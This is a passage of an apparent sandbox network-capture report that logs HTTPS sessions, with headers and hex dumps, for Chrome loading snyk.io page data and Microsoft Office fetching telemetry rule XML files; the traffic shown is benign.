                                                                                                                                                                                                                                                                                                              X-Matched-Path: /en-US/resource-library
                                                                                                                                                                                                                                                                                                              X-Middleware-Skip: 1
                                                                                                                                                                                                                                                                                                              X-Vercel-Id: arn1::62jhs-1729799352463-19a26c4815e4
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:49:12 GMT
                                                                                                                                                                                                                                                                                                              Content-Length: 3
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                                                                                                                                              Akamai-Cache-Status: NotCacheable from child
                                                                                                                                                                                                                                                                                                              Akamai-GRN: 0.5a1d4117.1729799352.1f612f6
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:12 UTC3INData Raw: 7b 7d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: {}


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                              106192.168.2.54986823.45.111.1604434724C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:12 UTC408OUTGET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/integrations.json HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: snyk.io
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              Cookie: user_utm={}
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:13 UTC608INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Cache-Control: private, no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                              Content-Type: application/json
                                                                                                                                                                                                                                                                                                              ETag: W/"n8ghbkpxg22azq"
                                                                                                                                                                                                                                                                                                              Server: Vercel
                                                                                                                                                                                                                                                                                                              X-Matched-Path: /en-US/integrations
                                                                                                                                                                                                                                                                                                              X-Vercel-Cache: MISS
                                                                                                                                                                                                                                                                                                              X-Vercel-Id: fra1::iad1::vc727-1729799352723-d66f3d56940a
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:49:13 GMT
                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Connection: Transfer-Encoding
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                                                                                                                                              Akamai-Cache-Status: NotCacheable from child
                                                                                                                                                                                                                                                                                                              Akamai-GRN: 0.42284317.1729799352.1095605
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:13 UTC15776INData Raw: 30 30 30 30 36 30 30 30 0d 0a 7b 22 70 61 67 65 50 72 6f 70 73 22 3a 7b 22 70 61 67 65 22 3a 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 74 61 67 73 22 3a 5b 5d 2c 22 63 6f 6e 63 65 70 74 73 22 3a 5b 5d 7d 2c 22 73 79 73 22 3a 7b 22 73 70 61 63 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 53 70 61 63 65 22 2c 22 69 64 22 3a 22 6f 79 72 62 72 69 34 33 61 64 7a 7a 22 7d 7d 2c 22 69 64 22 3a 22 46 75 53 4c 63 68 35 58 6f 30 4d 32 4a 34 63 4f 6c 48 38 39 69 22 2c 22 74 79 70 65 22 3a 22 45 6e 74 72 79 22 2c 22 63 72 65 61 74 65 64 41 74 22 3a 22 32 30 32 33 2d 30 34 2d 30 34 54 31 33 3a 30 30 3a 32 31 2e 38 30 33 5a 22 2c 22 75 70 64 61 74 65 64 41 74 22 3a 22 32 30 32 34 2d 30 39 2d 31 31 54 31
                                                                                                                                                                                                                                                                                                              Data Ascii: 00006000{"pageProps":{"page":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"FuSLch5Xo0M2J4cOlH89i","type":"Entry","createdAt":"2023-04-04T13:00:21.803Z","updatedAt":"2024-09-11T1
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:13 UTC8812INData Raw: 22 3a 22 4e 61 76 69 67 61 74 69 6f 6e 50 72 69 6d 61 72 79 4e 61 76 49 74 65 6d 22 2c 22 6c 61 62 65 6c 22 3a 22 50 72 6f 64 75 63 74 73 22 2c 22 75 72 6c 22 3a 6e 75 6c 6c 2c 22 64 72 6f 70 64 6f 77 6e 4d 65 6e 75 43 61 74 65 67 6f 72 69 65 73 22 3a 7b 22 69 74 65 6d 73 22 3a 5b 5d 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 4e 61 76 69 67 61 74 69 6f 6e 50 72 69 6d 61 72 79 4e 61 76 49 74 65 6d 44 72 6f 70 64 6f 77 6e 4d 65 6e 75 43 61 74 65 67 6f 72 69 65 73 43 6f 6c 6c 65 63 74 69 6f 6e 22 7d 2c 22 64 72 6f 70 64 6f 77 6e 4d 65 6e 75 43 6f 6c 75 6d 6e 73 22 3a 7b 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 4e 61 76 69 67 61 74 69 6f 6e 50 72 69 6d 61 72 79 4e 61 76 49 74 65 6d 44 72 6f 70 64 6f 77 6e 4d 65 6e 75 43 6f 6c 75 6d 6e 73 43 6f 6c 6c 65 63
                                                                                                                                                                                                                                                                                                              Data Ascii: ":"NavigationPrimaryNavItem","label":"Products","url":null,"dropdownMenuCategories":{"items":[],"__typename":"NavigationPrimaryNavItemDropdownMenuCategoriesCollection"},"dropdownMenuColumns":{"__typename":"NavigationPrimaryNavItemDropdownMenuColumnsCollec
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:13 UTC16384INData Raw: 30 30 30 30 36 30 30 30 0d 0a 5f 74 79 70 65 6e 61 6d 65 22 3a 22 53 79 73 22 7d 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 43 6f 6e 74 65 6e 74 4e 61 76 69 67 61 74 69 6f 6e 49 74 65 6d 22 2c 22 6c 61 62 65 6c 22 3a 22 45 74 68 69 63 61 6c 20 68 61 63 6b 69 6e 67 22 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 6e 75 6c 6c 2c 22 75 72 6c 22 3a 22 2f 73 65 72 69 65 73 2f 65 74 68 69 63 61 6c 2d 68 61 63 6b 69 6e 67 2f 22 2c 22 61 70 70 65 61 72 61 6e 63 65 22 3a 7b 22 6e 61 76 49 74 65 6d 22 3a 7b 22 69 63 6f 6e 22 3a 22 6c 6f 63 6b 2d 68 65 61 72 74 22 7d 7d 7d 2c 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 33 78 68 4e 59 42 32 45 65 57 4b 33 64 43 50 76 45 72 66 47 48 78 22 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 53 79 73 22 7d 2c 22 5f 5f 74 79 70
                                                                                                                                                                                                                                                                                                              Data Ascii: 00006000_typename":"Sys"},"__typename":"ContentNavigationItem","label":"Ethical hacking","description":null,"url":"/series/ethical-hacking/","appearance":{"navItem":{"icon":"lock-heart"}}},{"sys":{"id":"3xhNYB2EeWK3dCPvErfGHx","__typename":"Sys"},"__typ
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:13 UTC8204INData Raw: 4d 36 79 68 42 6c 78 6c 57 66 62 53 22 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 53 79 73 22 7d 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 43 6f 6e 74 65 6e 74 4e 61 76 69 67 61 74 69 6f 6e 49 74 65 6d 22 2c 22 6c 61 62 65 6c 22 3a 22 42 6f 6f 6b 20 61 20 64 65 6d 6f 22 2c 22 75 72 6c 22 3a 22 2f 73 63 68 65 64 75 6c 65 2d 61 2d 64 65 6d 6f 2f 22 7d 2c 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 37 7a 6a 39 63 56 62 67 35 4c 4a 50 34 6d 48 4b 61 72 58 4a 7a 57 22 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 53 79 73 22 7d 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 43 6f 6e 74 65 6e 74 4e 61 76 69 67 61 74 69 6f 6e 49 74 65 6d 22 2c 22 6c 61 62 65 6c 22 3a 22 43 61 72 65 65 72 73 22 2c 22 75 72 6c 22 3a 22 2f 63 61 72 65 65 72 73 2f 22 7d 2c 7b 22 73
                                                                                                                                                                                                                                                                                                              Data Ascii: M6yhBlxlWfbS","__typename":"Sys"},"__typename":"ContentNavigationItem","label":"Book a demo","url":"/schedule-a-demo/"},{"sys":{"id":"7zj9cVbg5LJP4mHKarXJzW","__typename":"Sys"},"__typename":"ContentNavigationItem","label":"Careers","url":"/careers/"},{"s
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:13 UTC16384INData Raw: 30 30 30 30 34 30 30 30 0d 0a 72 65 2d 63 6f 6e 74 61 69 6e 65 72 2d 72 65 67 69 73 74 72 79 2e 73 76 67 22 2c 22 74 61 67 73 22 3a 5b 5d 2c 22 74 79 70 65 22 3a 22 75 70 6c 6f 61 64 22 2c 22 62 79 74 65 73 22 3a 32 36 35 38 2c 22 77 69 64 74 68 22 3a 35 38 2c 22 66 6f 72 6d 61 74 22 3a 22 73 76 67 22 2c 22 68 65 69 67 68 74 22 3a 34 39 2c 22 76 65 72 73 69 6f 6e 22 3a 31 36 37 39 36 37 32 31 38 39 2c 22 64 75 72 61 74 69 6f 6e 22 3a 6e 75 6c 6c 2c 22 6d 65 74 61 64 61 74 61 22 3a 5b 5d 2c 22 70 75 62 6c 69 63 5f 69 64 22 3a 22 77 65 62 73 69 74 65 2d 6c 6f 67 6f 2d 69 63 6f 6e 73 2f 6c 6f 67 6f 69 63 6f 6e 2d 6d 69 63 72 6f 73 6f 66 74 2d 61 7a 75 72 65 2d 63 6f 6e 74 61 69 6e 65 72 2d 72 65 67 69 73 74 72 79 22 2c 22 63 72 65 61 74 65 64 5f 61 74 22 3a
                                                                                                                                                                                                                                                                                                              Data Ascii: 00004000re-container-registry.svg","tags":[],"type":"upload","bytes":2658,"width":58,"format":"svg","height":49,"version":1679672189,"duration":null,"metadata":[],"public_id":"website-logo-icons/logoicon-microsoft-azure-container-registry","created_at":
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:13 UTC12INData Raw: 61 74 22 3a 22 32 30 32 33 2d 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: at":"2023-
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:13 UTC16384INData Raw: 30 30 30 30 34 30 30 30 0d 0a 30 33 2d 32 34 54 31 35 3a 33 36 3a 32 38 5a 22 2c 22 73 65 63 75 72 65 5f 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 72 65 73 2e 63 6c 6f 75 64 69 6e 61 72 79 2e 63 6f 6d 2f 73 6e 79 6b 2f 69 6d 61 67 65 2f 75 70 6c 6f 61 64 2f 76 31 36 37 39 36 37 32 31 38 38 2f 77 65 62 73 69 74 65 2d 6c 6f 67 6f 2d 69 63 6f 6e 73 2f 6c 6f 67 6f 69 63 6f 6e 2d 67 69 74 6c 61 62 2e 73 76 67 22 2c 22 72 65 73 6f 75 72 63 65 5f 74 79 70 65 22 3a 22 69 6d 61 67 65 22 2c 22 72 61 77 5f 74 72 61 6e 73 66 6f 72 6d 61 74 69 6f 6e 22 3a 22 22 7d 5d 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 6e 75 6c 6c 2c 22 70 6c 75 67 69 6e 4c 69 6e 6b 22 3a 22 68 74 74 70 73 3a 2f 2f 73 6e 79 6b 2e 69 6f 2f 67 69 74 6c 61 62 2f 22 2c 22 70 6c 75 67 69 6e 4c 69
                                                                                                                                                                                                                                                                                                              Data Ascii: 0000400003-24T15:36:28Z","secure_url":"https://res.cloudinary.com/snyk/image/upload/v1679672188/website-logo-icons/logoicon-gitlab.svg","resource_type":"image","raw_transformation":""}],"description":null,"pluginLink":"https://snyk.io/gitlab/","pluginLi
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:13 UTC12INData Raw: 2c 22 6d 65 74 61 64 61 74 61 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: ,"metadata
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:13 UTC16384INData Raw: 30 30 30 30 36 30 30 30 0d 0a 22 3a 5b 5d 2c 22 70 75 62 6c 69 63 5f 69 64 22 3a 22 77 65 62 73 69 74 65 2d 63 75 73 74 6f 6d 65 72 2d 6c 6f 67 6f 73 2f 6c 6f 67 6f 2d 4f 70 73 4c 65 76 65 6c 22 2c 22 63 72 65 61 74 65 64 5f 61 74 22 3a 22 32 30 32 34 2d 30 33 2d 32 36 54 31 38 3a 33 33 3a 30 30 5a 22 2c 22 73 65 63 75 72 65 5f 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 72 65 73 2e 63 6c 6f 75 64 69 6e 61 72 79 2e 63 6f 6d 2f 73 6e 79 6b 2f 69 6d 61 67 65 2f 75 70 6c 6f 61 64 2f 76 31 37 31 31 34 37 37 39 38 30 2f 77 65 62 73 69 74 65 2d 63 75 73 74 6f 6d 65 72 2d 6c 6f 67 6f 73 2f 6c 6f 67 6f 2d 4f 70 73 4c 65 76 65 6c 2e 73 76 67 22 2c 22 72 65 73 6f 75 72 63 65 5f 74 79 70 65 22 3a 22 69 6d 61 67 65 22 7d 5d 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a
                                                                                                                                                                                                                                                                                                              Data Ascii: 00006000":[],"public_id":"website-customer-logos/logo-OpsLevel","created_at":"2024-03-26T18:33:00Z","secure_url":"https://res.cloudinary.com/snyk/image/upload/v1711477980/website-customer-logos/logo-OpsLevel.svg","resource_type":"image"}],"description":
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:13 UTC8204INData Raw: 65 63 75 72 65 5f 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 72 65 73 2e 63 6c 6f 75 64 69 6e 61 72 79 2e 63 6f 6d 2f 73 6e 79 6b 2f 69 6d 61 67 65 2f 75 70 6c 6f 61 64 2f 76 31 36 34 36 35 39 38 36 38 33 2f 77 6f 72 64 70 72 65 73 73 2d 73 79 6e 63 2f 6c 6f 67 6f 2d 73 79 73 64 69 67 2e 73 76 67 22 2c 22 72 65 73 6f 75 72 63 65 5f 74 79 70 65 22 3a 22 69 6d 61 67 65 22 7d 5d 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 6e 75 6c 6c 2c 22 70 6c 75 67 69 6e 4c 69 6e 6b 22 3a 22 68 74 74 70 73 3a 2f 2f 70 61 72 74 6e 65 72 73 2e 73 6e 79 6b 2e 69 6f 2f 45 6e 67 6c 69 73 68 2f 73 6f 6c 75 74 69 6f 6e 73 2f 73 6f 6c 75 74 69 6f 6e 2f 32 33 34 33 2f 73 79 73 64 69 67 2d 73 65 63 75 72 65 22 2c 22 70 6c 75 67 69 6e 4c 69 6e 6b 4c 61 62 65 6c 22 3a 22 55 73 65 20
                                                                                                                                                                                                                                                                                                              Data Ascii: ecure_url":"https://res.cloudinary.com/snyk/image/upload/v1646598683/wordpress-sync/logo-sysdig.svg","resource_type":"image"}],"description":null,"pluginLink":"https://partners.snyk.io/English/solutions/solution/2343/sysdig-secure","pluginLinkLabel":"Use


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                              107192.168.2.54986923.77.250.634434724C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:12 UTC638OUTGET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/customer-resources.json?slug=customer-resources HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: snyk.io
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                              purpose: prefetch
                                                                                                                                                                                                                                                                                                              x-nextjs-data: 1
                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                              x-middleware-prefetch: 1
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              Cookie: user_utm={}
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:12 UTC595INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                              Content-Type: application/json
                                                                                                                                                                                                                                                                                                              ETag: W/"16oc87j7skcymp"
                                                                                                                                                                                                                                                                                                              Server: Vercel
                                                                                                                                                                                                                                                                                                              X-Matched-Path: /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/customer-resources.json
                                                                                                                                                                                                                                                                                                              X-Vercel-Cache: STALE
                                                                                                                                                                                                                                                                                                              X-Vercel-Id: arn1::iad1::sx2lj-1729799352724-286ef3152036
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:49:12 GMT
                                                                                                                                                                                                                                                                                                              Content-Length: 44888
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                                                                                                                                              Akamai-Cache-Status: NotCacheable from child
                                                                                                                                                                                                                                                                                                              Akamai-GRN: 0.5a1d4117.1729799352.1f6132a
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:12 UTC15789INData Raw: 7b 22 70 61 67 65 50 72 6f 70 73 22 3a 7b 22 70 61 67 65 22 3a 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 74 61 67 73 22 3a 5b 5d 2c 22 63 6f 6e 63 65 70 74 73 22 3a 5b 5d 7d 2c 22 73 79 73 22 3a 7b 22 73 70 61 63 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 53 70 61 63 65 22 2c 22 69 64 22 3a 22 6f 79 72 62 72 69 34 33 61 64 7a 7a 22 7d 7d 2c 22 69 64 22 3a 22 32 7a 45 52 67 6b 31 4b 30 77 31 34 35 38 4b 36 37 7a 6c 38 5a 7a 22 2c 22 74 79 70 65 22 3a 22 45 6e 74 72 79 22 2c 22 63 72 65 61 74 65 64 41 74 22 3a 22 32 30 32 34 2d 30 32 2d 30 38 54 31 33 3a 34 36 3a 31 30 2e 33 31 35 5a 22 2c 22 75 70 64 61 74 65 64 41 74 22 3a 22 32 30 32 34 2d 30 34 2d 31 37 54 31 37 3a 34 34 3a 33 30 2e 39
                                                                                                                                                                                                                                                                                                              Data Ascii: {"pageProps":{"page":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"2zERgk1K0w1458K67zl8Zz","type":"Entry","createdAt":"2024-02-08T13:46:10.315Z","updatedAt":"2024-04-17T17:44:30.9
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:13 UTC16384INData Raw: 66 6f 72 20 64 65 76 65 6c 6f 70 65 72 73 20 6e 65 77 20 74 6f 20 53 6e 79 6b 20 74 6f 20 6c 65 61 72 6e 20 68 6f 77 20 74 6f 20 69 6e 74 65 67 72 61 74 65 20 53 6e 79 6b 20 69 6e 74 6f 20 74 68 65 69 72 20 64 65 76 65 6c 6f 70 6d 65 6e 74 20 77 6f 72 6b 66 6c 6f 77 2e 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 67 6f 2e 73 6e 79 6b 2e 69 6f 2f 32 30 32 34 2d 64 65 76 2d 6f 6e 62 6f 61 72 64 69 6e 67 2e 68 74 6d 6c 22 2c 22 6c 69 6e 6b 4c 61 62 65 6c 22 3a 22 57 61 74 63 68 20 6e 6f 77 22 7d 7d 5d 2c 22 61 70 70 65 61 72 61 6e 63 65 22 3a 7b 22 6d 65 64 69 61 43 61 72 64 47 72 69 64 22 3a 7b 22 6d 61 78 43 6f 6c 73 22 3a 22 34 22 7d 7d 7d 7d 5d 2c 22 66 6f 6f 74 65 72 43 74 61 22 3a 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 74 61 67 73 22 3a 5b 5d
                                                                                                                                                                                                                                                                                                              Data Ascii: for developers new to Snyk to learn how to integrate Snyk into their development workflow.","url":"https://go.snyk.io/2024-dev-onboarding.html","linkLabel":"Watch now"}}],"appearance":{"mediaCardGrid":{"maxCols":"4"}}}}],"footerCta":{"metadata":{"tags":[]
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:13 UTC3620INData Raw: 6c 61 62 65 6c 22 3a 22 43 6f 6d 70 61 6e 79 22 2c 22 75 72 6c 22 3a 6e 75 6c 6c 2c 22 64 72 6f 70 64 6f 77 6e 4d 65 6e 75 43 61 74 65 67 6f 72 69 65 73 22 3a 7b 22 69 74 65 6d 73 22 3a 5b 5d 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 4e 61 76 69 67 61 74 69 6f 6e 50 72 69 6d 61 72 79 4e 61 76 49 74 65 6d 44 72 6f 70 64 6f 77 6e 4d 65 6e 75 43 61 74 65 67 6f 72 69 65 73 43 6f 6c 6c 65 63 74 69 6f 6e 22 7d 2c 22 64 72 6f 70 64 6f 77 6e 4d 65 6e 75 43 6f 6c 75 6d 6e 73 22 3a 7b 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 4e 61 76 69 67 61 74 69 6f 6e 50 72 69 6d 61 72 79 4e 61 76 49 74 65 6d 44 72 6f 70 64 6f 77 6e 4d 65 6e 75 43 6f 6c 75 6d 6e 73 43 6f 6c 6c 65 63 74 69 6f 6e 22 2c 22 69 74 65 6d 73 22 3a 5b 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 37 71
                                                                                                                                                                                                                                                                                                              Data Ascii: label":"Company","url":null,"dropdownMenuCategories":{"items":[],"__typename":"NavigationPrimaryNavItemDropdownMenuCategoriesCollection"},"dropdownMenuColumns":{"__typename":"NavigationPrimaryNavItemDropdownMenuColumnsCollection","items":[{"sys":{"id":"7q
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:13 UTC9095INData Raw: 22 61 70 70 65 61 72 61 6e 63 65 22 3a 7b 22 6e 61 76 49 74 65 6d 22 3a 7b 22 69 63 6f 6e 22 3a 22 68 61 6e 64 2d 77 61 76 65 22 7d 7d 7d 5d 7d 7d 5d 7d 7d 2c 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 36 35 74 68 63 48 39 44 64 63 61 7a 42 52 52 39 4c 4f 66 37 36 56 22 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 53 79 73 22 7d 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 4e 61 76 69 67 61 74 69 6f 6e 44 72 6f 70 64 6f 77 6e 4d 65 6e 75 43 6f 6c 75 6d 6e 22 2c 22 72 6f 77 73 22 3a 7b 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 4e 61 76 69 67 61 74 69 6f 6e 44 72 6f 70 64 6f 77 6e 4d 65 6e 75 43 6f 6c 75 6d 6e 52 6f 77 73 43 6f 6c 6c 65 63 74 69 6f 6e 22 2c 22 69 74 65 6d 73 22 3a 5b 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 32 72 44 33 49 78 43 48 79 67 6b
                                                                                                                                                                                                                                                                                                              Data Ascii: "appearance":{"navItem":{"icon":"hand-wave"}}}]}}]}},{"sys":{"id":"65thcH9DdcazBRR9LOf76V","__typename":"Sys"},"__typename":"NavigationDropdownMenuColumn","rows":{"__typename":"NavigationDropdownMenuColumnRowsCollection","items":[{"sys":{"id":"2rD3IxCHygk


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                              108192.168.2.54986613.107.246.60443
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:12 UTC192OUTGET /rules/rule120624v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:12 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:49:12 GMT
                                                                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                                                                              Content-Length: 494
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                                                                                                                                                              ETag: "0x8DC582BB7010D66"
                                                                                                                                                                                                                                                                                                              x-ms-request-id: e7bd3bd0-f01e-003c-42e3-258cf0000000
                                                                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                              x-azure-ref: 20241024T194912Z-16849878b78ngdnlw4w0762cms000000085000000000tzc8
                                                                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:12 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                              109192.168.2.54987213.107.246.60443
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:12 UTC192OUTGET /rules/rule120626v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip
